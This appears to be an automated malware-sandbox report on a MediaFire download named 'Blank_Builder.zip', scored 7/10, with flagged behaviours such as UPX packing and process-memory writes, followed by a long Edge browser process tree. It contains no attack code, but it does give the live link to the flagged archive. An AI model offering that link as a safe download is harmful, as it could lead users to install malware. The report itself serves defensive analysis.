Analysis

  • max time kernel
    230s
  • max time network
    236s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240214-en
  • resource tags

    arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-03-2024 23:40

General

  • Target

    https://www.mediafire.com/file/zz36ikk4aiu3v4o/Blank_Builder.zip/file

Score
7/10
upx

Malware Config

Signatures

  • Loads dropped DLL 33 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/zz36ikk4aiu3v4o/Blank_Builder.zip/file
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa9103cb8,0x7ffaa9103cc8,0x7ffaa9103cd8
      2⤵
        PID:2924
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1808 /prefetch:2
        2⤵
          PID:4576
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4044
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
          2⤵
            PID:4832
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
            2⤵
              PID:5064
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
              2⤵
                PID:3608
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                2⤵
                  PID:4960
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
                  2⤵
                    PID:476
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
                    2⤵
                      PID:4968
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
                      2⤵
                        PID:1224
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                        2⤵
                          PID:2072
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
                          2⤵
                            PID:3632
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
                            2⤵
                              PID:3960
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
                              2⤵
                                PID:1092
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
                                2⤵
                                  PID:4928
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:1
                                  2⤵
                                    PID:4148
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
                                    2⤵
                                      PID:1208
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:1
                                      2⤵
                                        PID:3804
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
                                        2⤵
                                          PID:2300
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
                                          2⤵
                                            PID:3656
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7600 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4444
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:1
                                            2⤵
                                              PID:836
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8368 /prefetch:8
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1492
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
                                              2⤵
                                                PID:1672
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
                                                2⤵
                                                  PID:1660
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
                                                  2⤵
                                                    PID:3920
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8768 /prefetch:1
                                                    2⤵
                                                      PID:5216
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1
                                                      2⤵
                                                        PID:5232
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                                        2⤵
                                                          PID:5348
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                                                          2⤵
                                                            PID:5416
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
                                                            2⤵
                                                              PID:5484
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
                                                              2⤵
                                                                PID:5552
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9172 /prefetch:1
                                                                2⤵
                                                                  PID:5624
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                                                                  2⤵
                                                                    PID:5840
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8776 /prefetch:1
                                                                    2⤵
                                                                      PID:5848
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
                                                                      2⤵
                                                                        PID:2440
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
                                                                        2⤵
                                                                          PID:1264
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9504 /prefetch:1
                                                                          2⤵
                                                                            PID:5796
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8628 /prefetch:1
                                                                            2⤵
                                                                              PID:4436
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8648 /prefetch:1
                                                                              2⤵
                                                                                PID:2096
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8852 /prefetch:1
                                                                                2⤵
                                                                                  PID:4616
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:1
                                                                                  2⤵
                                                                                    PID:2612
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
                                                                                    2⤵
                                                                                      PID:840
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
                                                                                      2⤵
                                                                                        PID:5588
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
                                                                                        2⤵
                                                                                          PID:2248
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
                                                                                          2⤵
                                                                                            PID:6024
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
                                                                                            2⤵
                                                                                              PID:6104
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
                                                                                              2⤵
                                                                                                PID:3976
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1728 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:4388
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1972 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:2304
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:2252
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3084 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:1388
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4852
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5748
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:568
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4532
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8012 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:1096
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1720,3821045607182031178,7496062817446756110,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1296 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:1748
